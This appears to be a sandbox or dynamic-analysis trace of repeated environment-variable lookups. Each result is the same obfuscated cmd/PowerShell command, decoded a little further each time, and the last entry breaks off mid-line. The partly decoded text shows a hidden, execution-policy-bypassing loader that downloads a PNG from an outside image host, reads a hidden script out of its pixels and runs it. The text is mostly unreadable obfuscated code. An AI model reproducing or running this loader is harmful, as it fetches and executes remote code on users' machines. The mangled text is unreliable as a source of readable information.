Get Environment String name = ,_}~, result_out = seGCV suTd]Fl6aK. 1 @sheZVelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GCV'+'['+'A'+'3737-%'+'`kVe -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66kVBBQI37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmakV11Fl] qFl6NeGCV.W'+'e3QI9VDa'+'lZenGCV).'+'PjkVenRea3719a'+'7'+'%zEhGCVGCVkVs:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BQIVsK_X.'+'kVng9a7'+'))['+'Fl66kVBBQI'+'mQIaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'kVBBQI7 Zn10..H'+'2('+'))\Fl66kVBBQI'+'GCV'+'GCVaKFl66kVBBQI37s.aEe'+'GCVGCVyZ7el1Fl66kVBBQI7,'+'Fl6'+'6kVBBQI_'+')[Fl66kVBBQImQI'+'{Fl66kVBBQI'+'_*H28+Fl66kVBBQI7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'kVBBQIGCVGCV.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66kVBBQIGCV'+'GCV.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'kVBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').RekVlaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).RekVlaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).RekVlaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaTduE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Tdjh eqFl6NV:s3Td]V).Fl6aTd3e ) ^^^|GCVyPj4ERsheZVElTd -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NkVPjTdIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-TdQXIn'')1@ZnkVu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = '{, result_out = seGCV suTd]Fl6aK. 1 @sheZVelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBQI37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3QI9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BQIVsK_X.'+'png9a7'+'))['+'Fl66pBBQI'+'mQIaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBQI7 Zn10..H'+'2('+'))\Fl66pBBQI'+'GCV'+'GCVaKFl66pBBQI37s.aEe'+'GCVGCVyZ7el1Fl66pBBQI7,'+'Fl6'+'6pBBQI_'+')[Fl66pBBQImQI'+'{Fl66pBBQI'+'_*H28+Fl66pBBQI7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBQIGCVGCV.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66pBBQIGCV'+'GCV.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaTduE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Tdjh eqFl6NV:s3Td]V).Fl6aTd3e ) ^^^|GCVyPj4ERsheZVElTd -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjTdIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-TdQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = -}#, result_out = seGCV suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBQI37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3QI9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BQIVsK_X.'+'png9a7'+'))['+'Fl66pBBQI'+'mQIaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBQI7 Zn10..H'+'2('+'))\Fl66pBBQI'+'GCV'+'GCVaKFl66pBBQI37s.aEe'+'GCVGCVyZ7el1Fl66pBBQI7,'+'Fl6'+'6pBBQI_'+')[Fl66pBBQImQI'+'{Fl66pBBQI'+'_*H28+Fl66pBBQI7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBQIGCVGCV.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66pBBQIGCV'+'GCV.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaLuE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^|GCVyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = $+, result_out = seGCV suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBQI37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3QI9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BQIVsK_X.'+'png9a7'+'))['+'Fl66pBBQI'+'mQIaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBQI7 Zn10..H'+'2('+'))\Fl66pBBQI'+'GCV'+'GCVaKFl66pBBQI37s.aEe'+'GCVGCVyZ7el1Fl66pBBQI7,'+'Fl6'+'6pBBQI_'+')[Fl66pBBQImQI'+'{Fl66pBBQI'+'_*H28+Fl66pBBQI7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBQIGCVGCV.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66pBBQIGCV'+'GCV.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaLuE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^|GCVyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo True 1
Fn
Get Environment String name = _'*{, result_out = seGCV suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3k9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBk37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3k9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BkVsK_X.'+'png9a7'+'))['+'Fl66pBBk'+'mkaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBk7 Zn10..H'+'2('+'))\Fl66pBBk'+'GCV'+'GCVaKFl66pBBk37s.aEe'+'GCVGCVyZ7el1Fl66pBBk7,'+'Fl6'+'6pBBk_'+')[Fl66pBBkmk'+'{Fl66pBBk'+'_*H28+Fl66pBBk7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBkGCVGCV.B-3k9an37Dn5)*Dn6)-3k9X]'+'1Fl66pBBkGCV'+'GCV.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3k9le:e*XbGCV).VaLuE.InFl6PjkEVDaXmBkanD.IqFl6NVPjkesVDaRZGCVy%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^|GCVyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3k9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBkAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo True 1
Fn
Get Environment String name = ;`}~, result_out = set suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qFl6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'Fl66pBBk37s'+'aKFl] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11Fl] qFl6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRea3719a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgFlDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'Fl66pBBk'+'mkaKFl] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBk7 Zn10..H'+'2('+'))\Fl66pBBk'+'t'+'taKFl66pBBk37s.aEe'+'ttyZ7el1Fl66pBBk7,'+'Fl6'+'6pBBk_'+')[Fl66pBBkmk'+'{Fl66pBBk'+'_*H28+Fl66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBktt.B-3k9an37Dn5)*Dn6)-3k9X]'+'1Fl66pBBkt'+'t.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1Fl66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3k9le:e*Xbt).VaLuE.InFl6PjkEVDaXmBkanD.IqFl6NVPjkesVDaRZty%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^|tyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo True 1
Fn
Get Environment String name = +?.,, result_out = set suL]f6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBk37s'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRea3719a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eac%zEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBk37s.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9an37Dn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZty%11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6N%E]aVDa%I -qf6NXlPj -4Zqf6N %zEhI3737en -e7ecu%IPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6N37 ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo True 1
Fn
Get Environment String name = '], result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@s%zEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-%'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRead19a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eac%zEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZty%11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6N%E]aVDa%I -qf6NXlPj -4Zqf6N %zEhIdden -e7ecu%IPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cmd.e7E cgc oadZ/Yo True 1
Fn
Get Environment String name = [$#?, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{sTRInaEPjy{VDaTzEhA]Pjy#H).ReplaVDaE11{VDaTzEhA]Pjy98+{VDaTzEhA]Pjy8#+{VDaTzEhA]PjyDn06),{sTRInaEPjy{VDaTzEhA]PjyDn2H).ReplaVDaE11{VDaTzEhA]PjyDnDn8+{VDaTzEhA]Pjy5H+{VDaTzEhA]Pjy8Dn),{sTRInaEPjy{VDaTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aVDaTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc oadZ/Yo True 1
Fn
Get Environment String name = }\, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkECXmBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aCTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:CXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc oadZ/Yo True 1
Fn
Get Environment String name = *.@, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkECXmBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL 